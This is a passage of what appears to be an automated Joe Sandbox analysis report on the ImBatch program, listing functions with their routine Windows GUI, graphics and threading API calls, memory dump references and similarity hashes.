GetSystemMetrics.USER32 ref: 10A73006
GetSystemMetrics.USER32 ref: 10A73015
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,0000005C,00000000,10800000,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 10A73059

Strings

DAXAParkingWindow, xrefs: 10A72FB3, 10A72FD8

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: ClassMetricsSystem$InfoRegisterWindow
String ID: DAXAParkingWindow
API String ID: 2464315561-2300527401
Opcode ID: 50bc81209063fa1c5763512562fa5e23cd97fccc17c747263cf4d5b9ceabb9ef
Instruction ID: 232c242eeec4f7bcef26a139b38413dea7a123cb9fcde817eaa7483ea35bf531
Opcode Fuzzy Hash: 50bc81209063fa1c5763512562fa5e23cd97fccc17c747263cf4d5b9ceabb9ef
Instruction Fuzzy Hash: 4011A03A748350AAE304EBACCD93F6E3698EB44710F41C119FA05DB2D8DE62B801975A

Uniqueness

Uniqueness Score: -1.00%

Function 10A2B8C4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 10A2B90D
GdiplusStartup.GDIPLUS(10AE0BD4,10AE0BB8,10AE0BC8,?,10A64BC3,00000000,10A64C0F,?,?,00000000), ref: 10A2B922
MessageBoxW.USER32(00000000,Cannot start GDI+ Subsystem,ERROR,00000000), ref: 10A2B959

Strings

ERROR, xrefs: 10A2B94D
uZ;, xrefs: 10A2B937
Cannot start GDI+ Subsystem, xrefs: 10A2B952

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CountGdiplusMessageStartupTick
String ID: Cannot start GDI+ Subsystem$ERROR$uZ;
API String ID: 4286302122-3043415623
Opcode ID: 75167a7b2d86aeae103e8de1ca355145c6e88c7a02b378d062cf42cd076a3e4e
Instruction ID: ff1a6bb7440400b6504fc873bf3fac2f51f9700bb72b5534a4442b064418adb7
Opcode Fuzzy Hash: 75167a7b2d86aeae103e8de1ca355145c6e88c7a02b378d062cf42cd076a3e4e
Instruction Fuzzy Hash: D001FF702A92419BEBD4CBAD8CC6B693AD0F705318F518029F15CAE2D8CB7244C0CB26

Uniqueness

Uniqueness Score: -1.00%

Function 10A39AA4 Relevance: 9.2, APIs: 6, Instructions: 240COMMON

Download Yara Rule

APIs

SetMapMode.GDI32(00000000,00000001), ref: 10A39AF4
SetTextAlign.GDI32(00000000,00000000), ref: 10A39B03
MulDiv.KERNEL32(?,00000000,00000048), ref: 10A39B43
SetMapMode.GDI32(00000000,00000001), ref: 10A39C2B
SetTextAlign.GDI32(00000000,00000008), ref: 10A39C3A
MulDiv.KERNEL32(?,00000000,00000048), ref: 10A39C7A

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: AlignModeText
String ID:
API String ID: 2031635203-0
Opcode ID: 9309d1ae0fb4f9e16b44f441f24455c087c21f4582651d71213d6728ef1a96dc
Instruction ID: 2149e3c4aa4bc3085061d6b1c81a92e465d1b9d729ce2963e3928428a9de3727
Opcode Fuzzy Hash: 9309d1ae0fb4f9e16b44f441f24455c087c21f4582651d71213d6728ef1a96dc
Instruction Fuzzy Hash: 94912435A046189FDB00DF68D885B9EB7F9FF48301F108569F909DB2AADA74BC45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10841F14 Relevance: 9.1, APIs: 6, Instructions: 119threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 10841F1F
GetCurrentThreadId.KERNEL32 ref: 10841F2E

Part of subcall function 10841EE0: ResetEvent.KERNEL32(00000470,10841F69,?,?,00000000), ref: 10841EE6

EnterCriticalSection.KERNEL32(10A9FF74,?,?,00000000), ref: 10841F73
InterlockedExchange.KERNEL32(10A7E064,?), ref: 10841F8F
LeaveCriticalSection.KERNEL32(10A9FF74,00000000,108420D7,?,10A7E064,?,00000000,108420F6,?,10A9FF74,?,?,00000000), ref: 10841FE8
EnterCriticalSection.KERNEL32(10A9FF74,10842080,10A9FF74,00000000,108420D7,?,10A7E064,?,00000000,108420F6,?,10A9FF74,?,?,00000000), ref: 10842073

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
String ID:
API String ID: 2189153385-0
Opcode ID: ca1d5e3c7562c9a6cca2c2e3b4d59dd0d3413428cc2298b5c7a64335baaf13c6
Instruction ID: 71612136e712119a388e7e4df9b46a8848158b1018b5ffcea1e0ee9c0e54b5bb
Opcode Fuzzy Hash: ca1d5e3c7562c9a6cca2c2e3b4d59dd0d3413428cc2298b5c7a64335baaf13c6
Instruction Fuzzy Hash: 5C418E34A0C608AFDB05DFA8CC51BAEF7F9EB49300FA185A1F800D7650DB35A855DA61

Uniqueness

Uniqueness Score: -1.00%

Function 10A7308C Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32 ref: 10A730A6
SetWindowLongW.USER32(?,000000EB,00000000), ref: 10A730E6

Part of subcall function 10A72F94: GetClassInfoW.USER32 ref: 10A72FBE
Part of subcall function 10A72F94: RegisterClassW.USER32 ref: 10A72FE2
Part of subcall function 10A72F94: GetSystemMetrics.USER32 ref: 10A73006
Part of subcall function 10A72F94: GetSystemMetrics.USER32 ref: 10A73015
Part of subcall function 10A72F94: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,0000005C,00000000,10800000,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 10A73059

SetParent.USER32(00000000,00000000), ref: 10A730D9
GetWindowLongW.USER32 ref: 10A730FF
SetWindowLongW.USER32(?,000000EB,?), ref: 10A7313E
ShowWindow.USER32(00000000,00000005,00000000,10A7317E,?,?,000000EB,?,?,000000EB), ref: 10A7316F

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: Window$Long$ClassMetricsSystem$InfoParentRegisterShow
String ID:
API String ID: 1059544258-0
Opcode ID: bd96bfc45c6a347630272c3ba94c4f16f79f16c65854157568b93494d0fd0f27
Instruction ID: eb2870b3c3f1e667d3a306b4e6322d297bdce09a0d80824d6f2fb4ca300e5a47
Opcode Fuzzy Hash: bd96bfc45c6a347630272c3ba94c4f16f79f16c65854157568b93494d0fd0f27
Instruction Fuzzy Hash: 0931853A608704AFDF11DF68DD53E5E77A8EB49360F52CA61F904DB290D636ED41CA20

Uniqueness

Uniqueness Score: -1.00%

Function 108517FC Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000000), ref: 10851815
SelectObject.GDI32(00000000,00000000), ref: 1085181E
GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,?,?,?,1085702F,?,00000000,?,?,10856D92), ref: 10851832
SelectObject.GDI32(00000000,00000000), ref: 1085183E
DeleteDC.GDI32(00000000), ref: 10851844
CreatePalette.GDI32 ref: 1085188B

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
String ID:
API String ID: 2515223848-0
Opcode ID: c6c7ca4ce98fd0dba1bf85f40df3de2540fd8d5f373f606f6c6a5f7570d8cf91
Instruction ID: fa5f8ecda7a9690ec023904145d1ea8178e21625da4ad711d719e64a16f7253e
Opcode Fuzzy Hash: c6c7ca4ce98fd0dba1bf85f40df3de2540fd8d5f373f606f6c6a5f7570d8cf91
Instruction Fuzzy Hash: 1A01B57960C30072D7146B2D8C43B6F72F9DFC1654F05C829B58997295EA79DC488392

Uniqueness

Uniqueness Score: -1.00%

Function 10802D9C Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 10802E53
Sleep.KERNEL32(0000000A,00000000), ref: 10802E69
Sleep.KERNEL32(00000000), ref: 10802E97
Sleep.KERNEL32(0000000A,00000000), ref: 10802EAD

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 83169d95d5e71aa7e68e8144ffe3e9bc3888aafd00a6c4e5757b1c4efd7bd95e
Instruction ID: f5d399653c776e8747ffb4b49f8a714e22c57fd24b45e38c373d184614cf3188
Opcode Fuzzy Hash: 83169d95d5e71aa7e68e8144ffe3e9bc3888aafd00a6c4e5757b1c4efd7bd95e
Instruction Fuzzy Hash: 8EC134726196628FC719CF6CCDC0356BBE1EB85390F54C1AED4098B799DFB09842CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1086ED54 Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 1086ED60
GetTextMetricsW.GDI32(?,?,00000000,1086EDCA,?,00000001), ref: 1086ED7E

Part of subcall function 1084F00C: EnterCriticalSection.KERNEL32(-00000008,00000000,1084F20E,?,109F4888,00000001), ref: 1084F051

SelectObject.GDI32(?,00000000), ref: 1086ED93
GetTextMetricsW.GDI32(?,?,?,00000000,?,?,00000000,1086EDCA,?,00000001), ref: 1086EDA2
SelectObject.GDI32(?,00000000), ref: 1086EDAC
ReleaseDC.USER32 ref: 1086EDC4

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: MetricsObjectSelectText$CriticalEnterReleaseSection
String ID:
API String ID: 2458800664-0
Opcode ID: a6da7606484c80e28d8cdd8775d4772d1dc2eba01ae3d4b2844dc5b50ba385b1
Instruction ID: d794bdb6c46f09df38cac8788fa831ae2e54da5b18b30fd49ab80eb1d631af01
Opcode Fuzzy Hash: a6da7606484c80e28d8cdd8775d4772d1dc2eba01ae3d4b2844dc5b50ba385b1
Instruction Fuzzy Hash: 5001BF79A08248BFDB41EFECDC81E9EBBFCEB48600F510461F504E7644DA34BA008765

Uniqueness

Uniqueness Score: -1.00%

Function 1089FA10 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMON

Download Yara Rule

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 1089FA20
InterlockedExchange.KERNEL32(10AA0254,00000000), ref: 1089FA33
SetEvent.KERNEL32(00000000,10AA0254,00000000,?,108A2D7E,00000000,108A1787,?,00000000,?,00000000,108A198D,?,00000000,00000200,0000020E), ref: 1089FA47
GetCurrentThreadId.KERNEL32 ref: 1089FA4C
MsgWaitForMultipleObjects.USER32 ref: 1089FA75
CloseHandle.KERNEL32(00000000,00000000,10AA0254,00000000,?,108A2D7E,00000000,108A1787,?,00000000,?,00000000,108A198D,?,00000000,00000200), ref: 1089FA82

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CloseCurrentEventExchangeHandleHookInterlockedMultipleObjectsThreadUnhookWaitWindows
String ID:
API String ID: 2988543691-0
Opcode ID: 44ad8ef791ed70414d7b003be7e1129e8ab7d3281a7a411631d2c73029f8863e
Instruction ID: 8dd2f4edef401788e8216b9e1ab385dc3c762172bc376b3e6ec90ac181df854a
Opcode Fuzzy Hash: 44ad8ef791ed70414d7b003be7e1129e8ab7d3281a7a411631d2c73029f8863e
Instruction Fuzzy Hash: FCF014B5688326DAD740FBACCC8AFAD33D8EB80304F104618F254CA1E5CB78B885C615

Uniqueness

Uniqueness Score: -1.00%

Function 10857CC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 10857D7C
CreateHalftonePalette.GDI32(00000000,00000000,10A4E694,00000000,109F83CC), ref: 10857D89
ReleaseDC.USER32 ref: 10857D98
DeleteObject.GDI32(?), ref: 10857E06

Strings

(, xrefs: 10857D33

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CreateDeleteHalftoneObjectPaletteRelease
String ID: (
API String ID: 577518360-3887548279
Opcode ID: 63aa032c91d3441bcf5f9ed6cf06fc35e4b02802b6123275b6a72330984e548b
